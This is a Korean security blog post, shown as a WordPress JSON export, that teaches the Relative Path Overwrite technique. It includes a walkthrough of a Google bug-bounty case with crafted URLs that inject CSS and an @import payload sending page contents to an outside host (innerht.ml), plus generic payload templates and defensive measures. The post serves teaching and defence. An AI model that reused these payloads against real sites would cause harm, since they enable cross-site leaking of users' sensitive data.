{"id":332,"date":"2019-04-17T16:43:53","date_gmt":"2019-04-17T07:43:53","guid":{"rendered":"https:\/\/blog.rubiya.kr\/?p=332"},"modified":"2019-04-18T23:02:24","modified_gmt":"2019-04-18T14:02:24","slug":"relative-path-overwrite","status":"publish","type":"post","link":"https:\/\/blog.rubiya.kr\/index.php\/2019\/04\/17\/relative-path-overwrite\/","title":{"rendered":"Relative Path Overwrite"},"content":{"rendered":"\n

\uac1c\uc694<\/h3>\n\n\n\n

Relative Path Overwrite (RPO) \ub294 \ube0c\ub77c\uc6b0\uc800\uc640 \uc11c\ubc84\uac00 \uc0c1\ub300\uacbd\ub85c\ub97c \ud574\uc11d\ud558\ub294 \uacfc\uc815\uc5d0\uc11c\uc758 \ub3d9\uc791 \ucc28\uc774\ub97c \uc545\uc6a9\ud55c \ucd5c\uc2e0 \uacf5\uaca9\uae30\ubc95\uc774\ub2e4.
\uc774 \uae30\ubc95\uc744 \uc774\ud574\ud558\uae30\uc5d0 \uc55e\uc11c URL\uc758 \uc0c1\ub300\uacbd\ub85c\uc640 \uc808\ub300\uacbd\ub85c\uc758 \ucc28\uc774\uc5d0 \ub300\ud574 \uc54c\uc544\ubcf4\uc790.
\uc808\ub300\uacbd\ub85c\ub294 \ud504\ub85c\ud1a0\ucf5c\uacfc \ub3c4\uba54\uc778 \uc774\ub984\uc744 \ud3ec\ud568\ud55c \ubaa9\uc801\uc9c0 \uc8fc\uc18c\uc758 \uc804\uccb4 URL\uc744 \uc758\ubbf8\ud55c\ub2e4.
\ubc18\uba74\uc5d0 \uc0c1\ub300\uacbd\ub85c\ub294 \ubaa9\uc801\uc9c0\uc758 \ud504\ub85c\ud1a0\ucf5c\uc774\ub098 \ub3c4\uba54\uc778\uc744 \ud2b9\uc815\ud558\uc9c0 \uc54a\ub294\ub2e4.<\/p>\n\n\n\n

\uc808\ub300\uacbd\ub85c
https:\/\/rubiya.kr\/static\/<\/p>\n\n\n\n

\uc0c1\ub300\uacbd\ub85c
static\/somedirectory<\/p>\n\n\n\n

\uc5ec\uae30\uc11c \uc0c1\ub300\uacbd\ub85c\uc758 2\uac00\uc9c0 \uc0ac\uc6a9\ubc95\uc774 \uc874\uc7ac\ud55c\ub2e4.
\uccab \ubc88\uc9f8\ub85c \uc6b0\ub9ac\ub294 \ud604\uc7ac \uacbd\ub85c\uc5d0\uc11c “xyz”\ub77c\ub294 \ub514\ub809\ud1a0\ub9ac\ub97c \ucc3e\uc744 \uc218 \uc788\ub2e4.
\ub450 \ubc88\uc9f8\ub85c directory traversal \uae30\uc220\uc744 \ud1b5\ud574 “..\/xyz” \uc640 \uac19\uc774 \ud0d0\uc0c9\ud560 \uc218 \uc788\ub2e4.
\uc774\uac83\ub4e4\uc774 HTML\uc0c1\uc5d0\uc11c \uc5b4\ub5bb\uac8c \uc791\ub3d9\ud558\ub294\uc9c0 \uc77c\ubc18\uc801\uc778 css\ud30c\uc77c\uc744 \ud638\ucd9c\ud558\uba74\uc11c \uc54c\uc544\ubcf4\uc790.<\/p>\n\n\n\n


<html>
<head>
<link href=\"styles.css\" rel=\"stylesheet\" type=\"text\/css\" \/>
<\/head>
<body>
<\/body>
<\/html>
<\/code><\/p>\n\n\n\n

\uc608\uc2dc\uc758 link \ud0dc\uadf8\ub294 \uc0c1\ub300\uacbd\ub85c\ub97c \uc0ac\uc6a9\ud574 “style.css” \ud30c\uc77c\uc744 \ucc38\uc870\ud55c\ub2e4.
\uc774\ub294 \uc0ac\uc774\ud2b8 \ub514\ub809\ud1a0\ub9ac \uad6c\uc870 \uc0c1\uc5d0\uc11c \uc720\uc800\uac00 \uc5b4\ub514\uc5d0 \uc788\ub294\uc9c0\ub97c \uae30\ubc18\uc73c\ub85c \ud55c\ub2e4.
\uc608\ub97c\ub4e4\uc5b4 \uc720\uc800\uac00 “xyz”\ub77c\ub294 \ub514\ub809\ud1a0\ub9ac \ub0b4\uc5d0\uc11c css\ud30c\uc77c\uc744 \ud638\ucd9c\ud55c\ub2e4\uba74 “xyz\/style.css” \ud30c\uc77c\uc774 \ud638\ucd9c\ub420\uac83\uc774\ub2e4.
\uc5ec\uae30\uc11c \ud765\ubbf8\ub85c\uc6b4\uc810\uc740 \ube0c\ub77c\uc6b0\uc800\ub294 \uc11c\ubc84\uc758 \ud30c\uc77c\uc2dc\uc2a4\ud15c\uc5d0 \uc811\uadfc\ud560 \uc218 \uc5c6\ub294\ub370, \uc5b4\ub5bb\uac8c \uc8fc\uc5b4\uc9c4 \uacbd\ub85c\uac00 \uc815\uc0c1\uc801\uc778 \uacbd\ub85c\uc778\uc9c0\ub97c \uad6c\ubd84\ud558\ub294\uac00\uc774\ub2e4.
\uc815\ub2f5\uc740 \uad6c\ubd84\ud560 \uc218 \uc5c6\ub2e4<\/strong>.
\ud30c\uc77c\uc2dc\uc2a4\ud15c \uc678\ubd80\uc5d0\uc11c \ub514\ub809\ud1a0\ub9ac \uad6c\uc870\uac00 \uc815\uc0c1\uc801\uc778\uc9c0 \uc54c \uc218 \uc788\ub294 \ubc29\ubc95\uc740 \uc5c6\uc73c\uba70,
\uc6b0\ub9ac\ub294 \uc624\uc9c1 \uacbd\ud5d8\uc5d0 \uc758\ud55c \ucd94\uce21\uacfc \uc751\ub2f5\ud558\ub294 http \uc0c1\ud0dc \ucf54\ub4dc\ub97c \ud1b5\ud574 \ud30c\uc77c\uc758 \uc874\uc7ac \uc720\ubb34\ub97c \uc54c \uc218 \uc788\uc744 \ubfd0\uc774\ub2e4.<\/p>\n\n\n\n

\uc5ec\uae30\uc11c RPO\uc758 \uac1c\ub150\uc774 \uc2dc\uc791\ub41c\ub2e4.
\ube0c\ub77c\uc6b0\uc800\uc640 \uc11c\ubc84\uac00 URL \uacbd\ub85c\ub97c \ud574\uc11d\ud558\ub294\ub370\uc5d0 \uc788\uc5b4 \ubc1c\uc0dd\ud558\ub294 \ucc28\uc774\ub97c \uc18d\uc774\ub294\uac83\uc774\ub2e4.
\uc608\ub97c\ub4e4\uc5b4 dot (.), slash (\/), backslash (\\), question mark (?), semi-colon (;) \ud639\uc740 \uc774\uac83\ub4e4\uc774 URL \uc778\ucf54\ub529\ub418\uba74 URL\uc5d0\uc11c \ud2b9\uc218\ud55c \uc758\ubbf8\ub97c \uac16\ub294\ub2e4.
\uc11c\ubc84\uc640 \ube0c\ub77c\uc6b0\uc800\ub294 \uc774\ub97c \uc11c\ub85c \ub2e4\ub974\uac8c \ud574\uc11d\ud560 \uc218 \uc788\ub2e4.
\uc774 \ud574\uc11d\uc758 \ucc28\uc774\ub97c \uc545\uc6a9\ud558\ub294\uac83\uc774 RPO\uc758 \uac1c\ub150\uc774\ub2e4.<\/p>\n\n\n\n

Self-referencing<\/h3>\n\n\n\n

<link href=”style.css” rel=”stylesheet” type=”text\/css” \/>
\uc704\uc640 \uac19\uc740 \ucf54\ub4dc\uac00 \uc874\uc7ac\ud558\ub294 \/somepage.php \ud30c\uc77c\uc744 \ud638\ucd9c\ud55c\ub2e4\uace0 \uac00\uc815\ud574\ubcf4\uc790.
link \ud0dc\uadf8\ub97c \ud1b5\ud574 \/style.css<\/strong> \ud30c\uc77c\uc774 \ud638\ucd9c\ub420\uac83\uc774\ub2e4.
\uadf8\ub7ec\uba74 \uc774\ubc88\uc5d0\ub294 url rewrite<\/a>\ub97c \uc545\uc6a9\ud574 \/somepage.php\/path\/ \ud30c\uc77c\uc744 \ud638\ucd9c\ud574\ubcf4\uc790.
\uc2e4\uc81c\ub85c \uc11c\ubc84\uc5d0\uc11c \ud638\ucd9c\ub418\ub294 \ud30c\uc77c\uc740 \/somepage.php \uc774\uc9c0\ub9cc \ube0c\ub77c\uc6b0\uc800\ub294 \/somepage.php\/path\/ \ub97c \ub514\ub809\ud1a0\ub9ac\ub85c \uc778\uc2dd\ud558\uac8c \ub41c\ub2e4.
\ub530\ub77c\uc11c link\ud0dc\uadf8\ub97c \ud1b5\ud574 \ud638\ucd9c\ub418\ub294 css\ud30c\uc77c\uc758 \uacbd\ub85c\ub294 \/somepage.php\/path\/style.css<\/strong> \uac00 \ub41c\ub2e4.
\ubc18\uba74 \uc11c\ubc84\uc5d0\uc11c \uc751\ub2f5\ud558\ub294 \ud30c\uc77c\uc758 \ub0b4\uc6a9\uc740 \/somepage.php \uac00 \ub420 \uac83\uc774\ub2e4.
\uc989 somepage.php\uc758 HTML\ucf54\ub4dc\ub97c CSS\ub85c import\ud558\uac8c \ub41c\ub2e4.
CSS\ub294 \ubb38\ubc95\uc5d0 \ub9de\uc9c0 \uc54a\ub294 \ucf54\ub4dc\ub294 \ubb34\uc2dc\ud558\uace0 \ubb38\ubc95\uc5d0 \ub9de\ub294 \ucf54\ub4dc\uac00 \ub098\uc62c\ub54c\uae4c\uc9c0 \uacc4\uc18d \ub2e4\uc74c\uc904\ub85c \ub118\uc5b4\uac04\ub2e4\ub294 \ud2b9\uc131\uc744 \uc0dd\uac01\ud574\ubcf4\uba74 \uc758\ubbf8\uc2ec\uc7a5\ud558\uc9c0 \uc54a\uc740\uac00? \ud83d\ude42<\/p>\n\n\n\n

\uc2e4\uc2b5<\/h3>\n\n\n\n

Google\uc5d0\uc11c RPO \uae30\ubc95\uc744 \ud1b5\ud574 Bug Bounty\ub97c \uc131\uacf5\ud55c \uc0ac\ub840\ub97c \ub530\ub77c\uac00\uba70 RPO\uc758 \uc2e4\uc81c \uc0ac\uc6a9\uc608\uc2dc\ub97c \ub2e4\ub8e8\uc5b4\ubcf4\uc790.
\uba3c\uc800 \uc0c1\ub300 \uacbd\ub85c\ub85c css\ud30c\uc77c\uc744 \ubd88\ub7ec\uc624\ub294 \ubb38\uc11c\ub97c \ucc3e\ub294\ub2e4.

http:\/\/www.google.com\/tools\/toolbar\/buttons\/apis\/howto_guide.html
<html>
<head>
<title>Google Toolbar API – Guide to Making Custom Buttons<\/title>
<link href=”..\/..\/styles.css” rel=”stylesheet” type=”text\/css” \/>
[..]

\ub2e4\uc74c\uc73c\ub85c \ud0c0\uac9f \uc11c\ubc84\uac00 \uacbd\ub85c\ub97c \uc5b4\ub5bb\uac8c \ud574\uc11d\ud558\ub294\uc9c0\ub97c \ubd84\uc11d\ud574\uc57c \ud55c\ub2e4.
\ube0c\ub77c\uc6b0\uc800\uc5d0\uc11c \ub514\ub809\ud1a0\ub9ac\ub294 slash(\/) \ub85c \uad6c\ubd84\ub41c\ub2e4.
\uadf8\ub7ec\ub098 \uc11c\ubc84\uc5d0\uc11c\ub294 \ub514\ub809\ud1a0\ub9ac\ub97c \uad6c\ubd84\ud558\ub294\ub370\uc5d0 slash(\/) \uc678\uc5d0\ub3c4 \ub2e4\ub978 \ubb38\uc790\uac00 \uc0ac\uc6a9\ub420 \uc218 \uc788\ub2e4.
\uc608\ub97c\ub4e4\uc5b4 JSP\uc5d0\uc11c\ub294 semi-colon(;) \ub4a4\uc5d0 \uc624\ub294 \ubaa8\ub4e0 \ubb38\uc790\ub97c \ud30c\ub77c\ubbf8\ud130\ub85c \ucc98\ub9ac\ud55c\ub2e4.
e.x) http:\/\/example.com\/path;\/notpath
\ud558\uc9c0\ub9cc \ube0c\ub77c\uc6b0\uc800\ub294 \uc774\ub7f0 \ud328\ud134\uc744 \uc778\uc2dd\ud560 \uc218 \uc5c6\uae30\uc5d0 \uc608\uc2dc\uc5d0\uc11c path; \uc640 notpath\ub97c \uac01\uac01 \uacbd\ub85c\ub85c \ucc98\ub9ac\ud55c\ub2e4.<\/p>\n\n\n\n

\ube44\uc2b7\ud558\uac8c \uc6b0\ub9ac\uac00 \ucc3e\uc740 \uad6c\uae00 \ud234\ubc14 \uc11c\ube44\uc2a4\uc5d0\ub294 \uacbd\ub85c\ub97c \ud574\uc11d\ud558\ub294 \uc790\uccb4\uc801\uc778 \ubc29\ubc95\uc774 \uc874\uc7ac\ud588\ub2e4.
\uc11c\ubc84 \uc55e\ub2e8\uc758 \ud504\ub85d\uc2dc\uc5d0\uc11c Request\uac00 \uc2e4\uc81c \uc11c\ubc84\uc5d0 \ub118\uc5b4\uac00\uae30 \uc804\uc5d0 \uacbd\ub85c\ub97c decode\ud574\uc8fc\ub294 \uc5ed\ud560\uc744 \ud558\ub294\uac83\uc73c\ub85c \ucd94\uce21\ub41c\ub2e4.
\uc774 \ub355\ubd84\uc5d0 \uacbd\ub85c\uc5d0 %2f\ub97c \uc785\ub825\ud588\uc744\ub54c slash\ub85c \uce58\ud658\ub418\uc5b4 \ucc98\ub9ac\ub418\uc5c8\ub2e4.
http:\/\/www.google.com\/tools\/toolbar\/buttons\/apis%2f<\/strong>howto_guide.html <\/p>\n\n\n\n

\uc11c\ubc84\uce21 \uad00\uc810 : \/tools\/toolbar\/buttons\/apis\/<\/strong>howto_guide.html
\ube0c\ub77c\uc6b0\uc800\uce21 \uad00\uc810 : \/tools\/toolbar\/buttons\/<\/strong>apis%2fhowto_guide.html
\ud638\ucd9c\ub418\ub294 CSS \ud30c\uc77c : \/tools\/<\/strong>toolbar\/buttons\/..\/..\/<\/strike>style.css
(Bold\uccb4\ub294 \uc2e4\uc81c \uacbd\ub85c\ub97c \uc758\ubbf8\ud55c\ub2e4)<\/p>\n\n\n\n

\uc774\uc81c \uacbd\ub85c\uac00 \/tools\/toolbar\/buttons\/apis\/ \ub300\uc2e0 \/tools\/toolbar\/buttons\/ \ub97c \uac00\ub9ac\ud0a4\uac8c \ub418\uc5c8\ub2e4.
\ub354 \ub9ce\uc740\uac83\uc774 \uac00\ub2a5\ud558\uc9c0 \uc54a\uc744\uae4c?
\ubb3c\ub860\uc774\ub2e4. \uc6b0\ub9ac\ub294 \ub514\ub809\ud1a0\ub9ac\ub97c \uc18d\uc77c \uc218 \uc788\ub2e4.<\/strong>
<\/p>\n\n\n\n

http:\/\/www.google.com\/tools\/fake\/..%2ftoolbar\/buttons\/apis%2fhowto_guide.html
\uc11c\ubc84\uce21 \uad00\uc810 : \/tools\/<\/strong>fake\/..\/<\/strike>toolbar\/buttons\/apis\/<\/strong>howto_guide.html
\ube0c\ub77c\uc6b0\uc800\uce21 \uad00\uc810 : \/tools\/fake\/..%2ftoolbar\/buttons\/<\/strong>apis%2fhowto_guide.html
\ud638\ucd9c\ub418\ub294 CSS \ud30c\uc77c : \/tools\/fake\/<\/strong>..%2ftoolbar\/buttons\/..\/..\/<\/strike>style.css
(Bold\uccb4\ub294 \uc2e4\uc81c \uacbd\ub85c\ub97c \uc758\ubbf8\ud55c\ub2e4)

\uc790, \uc774\uc81c \/tools\/fake\/styles.css \ub97c import \ud558\uac8c \ub418\uc5c8\ub2e4.<\/p>\n\n\n\n

\uc774\ub807\uac8c \ud574\uc11c \uc6b0\ub9ac\ub294 http:\/\/www.google.com\/ \uc5d0 \uc874\uc7ac\ud558\ub294 \ubaa8\ub4e0 style.css \ud30c\uc77c\uc744 \ud638\ucd9c\ud560 \uc218 \uc788\uac8c \ub418\uc5c8\ub2e4.
\uadf8 \ud6c4 \ucd94\uac00\uc801\uc778 \ud0d0\uc0c9\uc744 \ud558\ub2e4\uac00
http:\/\/www.google.com\/tools\/toolbar\/buttons\/gallery \ud398\uc774\uc9c0\uac00
http:\/\/www.google.com\/gadgets\/directory?synd=toolbar&frontpage=1 \ub85c \ub9ac\ub2e4\uc774\ub809\ud2b8\ub418\ub294\uac83\uc744 \ubc1c\uacac\ud588\ub2e4.
\ub9ac\ub2e4\uc774\ub809\ud2b8\uc5d0\ub294 \ucffc\ub9ac\uc2a4\ud2b8\ub9c1\uc774 \ud3ec\ud568\ub41c\ub2e4.
\uc989
http:\/\/www.google.com\/tools\/toolbar\/buttons\/gallery?foo=bar<\/strong> \uc5d0 \uc811\uc18d\ud558\uba74
http:\/\/www.google.com\/gadgets\/directory?synd=toolbar&frontpage=1&foo=bar<\/strong> \ub85c \ub9ac\ub2e4\uc774\ub809\ud2b8\ub41c\ub2e4.
<\/p>\n\n\n\n

\ub610\ud55c \ub9ac\ub2e4\uc774\ub809\ud2b8\ub41c \/gadgets\/directory \ud398\uc774\uc9c0\ub294 q \ud30c\ub77c\ubbf8\ud130\ub85c \ubc1b\uc544\uc628 \uac12\uc744 response\uc5d0 \ud3ec\ud568\uc2dc\ud0a8\ub2e4.
http:\/\/www.google.com\/gadgets\/directory?synd=toolbar&frontpage=1&q=%0a{}*{background:red}
<\/p>\n\n\n\n

\"Injecting<\/figure>\n\n\n\n

\ub9cc\uc57d \uc774 \ud398\uc774\uc9c0\ub97c CSS\ud30c\uc77c\ub85c \ud638\ucd9c\ud558\uba74 \uc704\uc758 html \ucf54\ub4dc\uac00 \ubaa8\ub450 \ubb34\uc2dc\ub418\ub2e4\uac00
83\ub77c\uc778\uc758 {}*{background:red} \ub97c \ub9cc\ub098 \uc2a4\ud0c0\uc77c\uc2dc\ud2b8\uac00 \uc2e4\ud589 \ub420 \uac83\uc774\ub2e4.<\/p>\n\n\n\n

\uc774\uc81c \ud37c\uc990\uc758 \ubaa8\ub4e0 \uc870\uac01\uc774 \ubaa8\uc600\ub2e4. \ucd5c\uc885 \ud398\uc774\ub85c\ub4dc\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.
http:\/\/www.google.com\/tools\/toolbar\/buttons%2Fgallery%3Fq%3D%0a%7B%7D*%7Bbackground%3Ared%7D\/..%2F\/apis\/howto_guide.html
<\/p>\n\n\n\n

\uc11c\ubc84\uce21 \uad00\uc810 : \/tools\/toolbar\/buttons\/<\/strong>gallery?q=%0a{}*{background:red}\/..\/<\/strike>\/apis\/<\/strong>howto_guide.html
\ube0c\ub77c\uc6b0\uc800\uce21 \uad00\uc810 : \/tools\/toolbar\/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bbackground%253Ared%257D\/..%2f\/apis\/<\/strong>howto_guide.html
\ud638\ucd9c\ub418\ub294 css \ud30c\uc77c : \/tools\/toolbar\/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bbackground%253Ared%257D\/<\/strong>..%2f\/apis\/..\/..\/<\/strike>style.css
\u21d3
\/tools\/toolbar\/buttons\/gallery?q=%0a{}*{background:red}\/style.css<\/strong>
\u21d3
\/gadgets\/directory?synd=toolbar&frontpage=1&q=%0a{}*{background:red}\/style.css <\/strong><\/p>\n\n\n\n

\"Background
\uc9dc\uc794!<\/figcaption><\/figure>\n\n\n\n

Internet Explorer 8 \uc774\ud558\uc5d0\uc11c expression(alert(document.domain)) \uc640 \uac19\uc740 \ud398\uc774\ub85c\ub4dc\ub97c \ud1b5\ud574 CSS\uc5d0\uc11c JavaScript \ucf54\ub4dc\ub97c \uc2e4\ud589\ud558\ub294\uac8c \uac00\ub2a5\ud558\ub2e4.
\ud558\uc9c0\ub9cc Google Vulnerability Reward Program \uc5d0\uc11c\ub294 IE9\ubcf4\ub2e4 \ub0ae\uc740 \ubc84\uc804\uc758 \ube0c\ub77c\uc6b0\uc800\ub294 \ubc14\uc6b4\ud2f0 \ub300\uc0c1\uc5d0\uc11c \uc81c\uc678\ud55c\ub2e4\uace0 \uba85\uc2dc\ub418\uc5b4\uc788\ub2e4.<\/p>\n\n\n\n

In particular, we exclude Internet Explorer prior to version 9<\/p><\/blockquote>\n\n\n\n

\uc9c0\uae08 \uc6b0\ub9ac\ub294 \uc704\uc5d0\uc11c \ucc3e\uc740 \ucde8\uc57d\uc810\uc744 \ud1b5\ud574 https:\/\/www.google.com\/ \uc0c1\uc5d0 \uc874\uc7ac\ud558\ub294 \ubaa8\ub4e0 \ud398\uc774\uc9c0\ub97c CSS\ub85c \uac00\uc838\uc62c \uc218 \uc788\ub2e4.
\uadf8\ub807\ub2e4\uba74 \uc774\uc81c \ubb34\uc5c7\uc744 \ud560 \uc218 \uc788\uc744\uae4c?
\ub2e4\ub978 \ud398\uc774\uc9c0\uc5d0\uc11c\uc758 \ubbfc\uac10 \uc815\ubcf4 \uc720\ucd9c\uc744 \uc2dc\ub3c4\ud574 \ubcfc \uc218 \uc788\ub2e4.
\ubbfc\uac10 \uc815\ubcf4 \uc720\ucd9c\uc744 \uc704\ud574\uc11c\ub294 \uc778\uc81d\uc158 \ud3ec\uc778\ud2b8\uac00 \ubbfc\uac10 \uc815\ubcf4\ubcf4\ub2e4 \uc55e\uc5d0 \uc788\uc5b4\uc57c\ud558\uba70 %0a, %0c, %0d\ub4f1 \uc904\ubc14\uafc8 \ubb38\uc790\ub97c \ud5c8\uc6a9\ud574\uc57c\ud55c\ub2e4.
\uad6c\uae00 \uac80\uc0c9 \ud398\uc774\uc9c0\uac00 \uc774\ub7f0 \uc870\uac74\uc744 \ub9cc\uc871\ud588\ub2e4.
http:\/\/www.google.com\/search?nord=1&q={}%0a@import”\/\/innerht.ml?<\/strong><\/p>\n\n\n\n

\"\uac80\uc0c9\uc2dc<\/figure>\n\n\n\n

@import”\/\/innerht.ml? \ub97c \ud1b5\ud574 \uc30d\ub530\uc74c\ud45c\uac00 \ub05d\ub0a0\ub54c\uae4c\uc9c0\uc758(\ub4dc\ub798\uadf8 \ub41c \ubb38\uc790\uc5f4) \ubb38\uc11c\uc758 \ub0b4\uc6a9\uc744 \uacf5\uaca9\uc790\uac00 \uac00\ub85c\ucc4c \uc218 \uc788\ub2e4.<\/p>\n\n\n\n

\ucd5c\uc885 \ud398\uc774\ub85c\ub4dc\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n

http:\/\/www.google.com\/tools\/toolbar\/buttons%2Fgallery%3Fq%3D%0a%7B%7D%40import%27%2Fsearch%3F
nord%3D1%26q%3D%7B%7D%250a%40import%2527%2F%2Finnerht.ml%3F%22\/..%2F\/apis\/howto_guide.html<\/p>\n\n\n\n

\"RPO

<\/figcaption><\/figure>\n\n\n\n

\uc608\uc2dc<\/h3>\n\n\n\n

\ub2e4\uc74c\uc740 \uacbd\ub85c \ud574\uc11d \uacfc\uc815\uc744 \ud63c\ub3d9\uc2dc\ud0a4\ub294 \uba87\uac00\uc9c0 \uc608\uc2dc\uc774\ub2e4.<\/p>\n\n\n\n

\/page.asp
\/page.asp\/PAYLOAD<\/strong>\/\/
\/page.asp\/PAYLOAD<\/strong>\/style.css
Path Parameter(Simple)<\/p>\n\n\n\n

\/page.php\/param1\/param2
\/page.php\/PAYLOAD<\/strong>param1\/PAYLOAD<\/strong>param2\/\/
\/page.php\/PAYLOAD<\/strong>param1\/PAYLOAD<\/strong>param2\/style.css
Path Parameter(PHP or ASP)<\/p>\n\n\n\n

\/page.jsp;param1;param2
\/page.jsp;PAYLOAD<\/strong>param1;PAYLOAD<\/strong>param2\/\/
\/page.jsp;PAYLOAD<\/strong>param1;PAYLOAD<\/strong>param2\/style.css
Path Parameter(JSP)<\/p>\n\n\n\n

\/dir\/page.aspx
\/PAYLOAD<\/strong>\/..%2Fdir\/PAYLOAD<\/strong>\/..%2Fpage.aspx\/\/
\/PAYLOAD<\/strong>\/..%2Fdir\/PAYLOAD<\/strong>\/..%2Fpage.aspx\/style.css
Encoded Path<\/p>\n\n\n\n

\/page.html?k1=v1&k2=v2
\/page.html%3Fk1=PAYLOAD<\/strong>v1&k2=PAYLOAD<\/strong>v2\/\/
\/page.html%3Fk1=PAYLOAD<\/strong>v1&k2=PAYLOAD<\/strong>v2\/style.css
Encoded Query<\/p>\n\n\n\n

\ubc29\uc5b4\ubc29\ubc95<\/h3>\n\n\n\n

\ubaa8\ub4e0 \ub9ac\uc18c\uc2a4\ub97c \uc808\ub300\uacbd\ub85c\ub85c\ub9cc \ud638\ucd9c\ud558\uac70\ub098, \uc0c1\ub300\uacbd\ub85c\uc758 \uae30\uc900\uc774 \ub418\ub294 \uc808\ub300\uacbd\ub85c\ub97c \uc9c0\uc815\ud558\ub294 \uc5ed\ud560\uc744 \ud558\ub294 Base\ud0dc\uadf8<\/a>\ub97c \uc0ac\uc6a9\ud574 \uacbd\ub85c \ud574\uc11d\uc758 \ubaa8\ud638\uc131\uc744 \uc5c6\uc568 \uc218 \uc788\ub2e4.
\ub610\ud55c \uc0ac\uc6a9\uc790\uac00 \uc785\ub825\ud55c \ubaa8\ub4e0 \ud2b9\uc218\ubb38\uc790\ub294 HTML Entity\ub85c \uce58\ud658\ud55c\ub2e4.
\uadf8\ub9ac\uace0 X-Content-Type-Options<\/a> HTTP \ud5e4\ub354\ub97c \uc120\uc5b8\ud574 \uc11c\ubc84\uac00 \uc804\uc1a1\ud55c MIME \ud0c0\uc785\ub9cc \uc0ac\uc6a9\ud558\uac8c \ud558\uac70\ub098,
X-Frame-Options<\/a> \ud5e4\ub354\ub97c \uc120\uc5b8\ud574 \ud504\ub808\uc784 \ub0b4\uc5d0\uc11c \ud398\uc774\uc9c0\ub97c \ub2e4\uc2dc \ub85c\ub4dc\ud560 \uc218 \uc5c6\uac8c \ud558\ub294\ub4f1\uc758 \ubc29\ubc95\uc774 \uc788\ub2e4.<\/p>\n\n\n\n

Reference<\/p>https:\/\/seclab.ccs.neu.edu\/static\/publications\/www2018rpo.pdf
https:\/\/www.mbsd.jp\/Whitepaper\/rpo.pdf
https:\/\/blog.innerht.ml\/rpo-gadgets\/
<\/cite><\/blockquote>\n","protected":false},"excerpt":{"rendered":"

\uac1c\uc694 Relative Path Overwrite (RPO) \ub294 \ube0c\ub77c\uc6b0\uc800\uc640 \uc11c\ubc84\uac00 \uc0c1\ub300\uacbd\ub85c\ub97c \ud574\uc11d\ud558\ub294 \uacfc\uc815\uc5d0\uc11c\uc758 \ub3d9\uc791 \ucc28\uc774\ub97c \uc545\uc6a9\ud55c \ucd5c\uc2e0 \uacf5\uaca9\uae30\ubc95\uc774\ub2e4.\uc774 \uae30\ubc95\uc744 \uc774\ud574\ud558\uae30\uc5d0 \uc55e\uc11c URL\uc758 \uc0c1\ub300\uacbd\ub85c\uc640 \uc808\ub300\uacbd\ub85c\uc758 \ucc28\uc774\uc5d0 \ub300\ud574 \uc54c\uc544\ubcf4\uc790.\uc808\ub300\uacbd\ub85c\ub294 \ud504\ub85c\ud1a0\ucf5c\uacfc \ub3c4\uba54\uc778 \uc774\ub984\uc744 \ud3ec\ud568\ud55c \ubaa9\uc801\uc9c0 \uc8fc\uc18c\uc758 \uc804\uccb4 URL\uc744 \uc758\ubbf8\ud55c\ub2e4.\ubc18\uba74\uc5d0 \uc0c1\ub300\uacbd\ub85c\ub294 \ubaa9\uc801\uc9c0\uc758 \ud504\ub85c\ud1a0\ucf5c\uc774\ub098 \ub3c4\uba54\uc778\uc744 \ud2b9\uc815\ud558\uc9c0 \uc54a\ub294\ub2e4. \uc808\ub300\uacbd\ub85chttps:\/\/rubiya.kr\/static\/ \uc0c1\ub300\uacbd\ub85cstatic\/somedirectory \uc5ec\uae30\uc11c \uc0c1\ub300\uacbd\ub85c\uc758 2\uac00\uc9c0 \uc0ac\uc6a9\ubc95\uc774 \uc874\uc7ac\ud55c\ub2e4.\uccab \ubc88\uc9f8\ub85c \uc6b0\ub9ac\ub294 \ud604\uc7ac \uacbd\ub85c\uc5d0\uc11c “xyz”\ub77c\ub294 \ub514\ub809\ud1a0\ub9ac\ub97c \ucc3e\uc744 \uc218 \uc788\ub2e4.\ub450 \ubc88\uc9f8\ub85c directory traversal \uae30\uc220\uc744 \ud1b5\ud574 “..\/xyz” \uc640 \uac19\uc774 \ud0d0\uc0c9\ud560 \uc218 \uc788\ub2e4.\uc774\uac83\ub4e4\uc774 HTML\uc0c1\uc5d0\uc11c \uc5b4\ub5bb\uac8c \uc791\ub3d9\ud558\ub294\uc9c0 \uc77c\ubc18\uc801\uc778 css\ud30c\uc77c\uc744 \ud638\ucd9c\ud558\uba74\uc11c \uc54c\uc544\ubcf4\uc790. <html><head><link href=”styles.css” rel=”stylesheet” type=”text\/css” \/><\/head><body><\/body><\/html> \uc608\uc2dc\uc758 link \ud0dc\uadf8\ub294 \uc0c1\ub300\uacbd\ub85c\ub97c \uc0ac\uc6a9\ud574 “style.css” \ud30c\uc77c\uc744 \ucc38\uc870\ud55c\ub2e4.\uc774\ub294 \uc0ac\uc774\ud2b8 \ub514\ub809\ud1a0\ub9ac \uad6c\uc870 \uc0c1\uc5d0\uc11c \uc720\uc800\uac00 \uc5b4\ub514\uc5d0 \uc788\ub294\uc9c0\ub97c \uae30\ubc18\uc73c\ub85c \ud55c\ub2e4.\uc608\ub97c\ub4e4\uc5b4 \uc720\uc800\uac00 “xyz”\ub77c\ub294 \ub514\ub809\ud1a0\ub9ac \ub0b4\uc5d0\uc11c css\ud30c\uc77c\uc744 \ud638\ucd9c\ud55c\ub2e4\uba74 “xyz\/style.css” \ud30c\uc77c\uc774 \ud638\ucd9c\ub420\uac83\uc774\ub2e4.\uc5ec\uae30\uc11c \ud765\ubbf8\ub85c\uc6b4\uc810\uc740 \ube0c\ub77c\uc6b0\uc800\ub294 \uc11c\ubc84\uc758 \ud30c\uc77c\uc2dc\uc2a4\ud15c\uc5d0 \uc811\uadfc\ud560 \uc218 \uc5c6\ub294\ub370, \uc5b4\ub5bb\uac8c \uc8fc\uc5b4\uc9c4 \uacbd\ub85c\uac00 \uc815\uc0c1\uc801\uc778 \uacbd\ub85c\uc778\uc9c0\ub97c \uad6c\ubd84\ud558\ub294\uac00\uc774\ub2e4.\uc815\ub2f5\uc740 \uad6c\ubd84\ud560 \uc218 \uc5c6\ub2e4.\ud30c\uc77c\uc2dc\uc2a4\ud15c \uc678\ubd80\uc5d0\uc11c \ub514\ub809\ud1a0\ub9ac \uad6c\uc870\uac00 \uc815\uc0c1\uc801\uc778\uc9c0 \uc54c \uc218 \uc788\ub294 \ubc29\ubc95\uc740 \uc5c6\uc73c\uba70,\uc6b0\ub9ac\ub294 \uc624\uc9c1 \uacbd\ud5d8\uc5d0 \uc758\ud55c \ucd94\uce21\uacfc \uc751\ub2f5\ud558\ub294 http 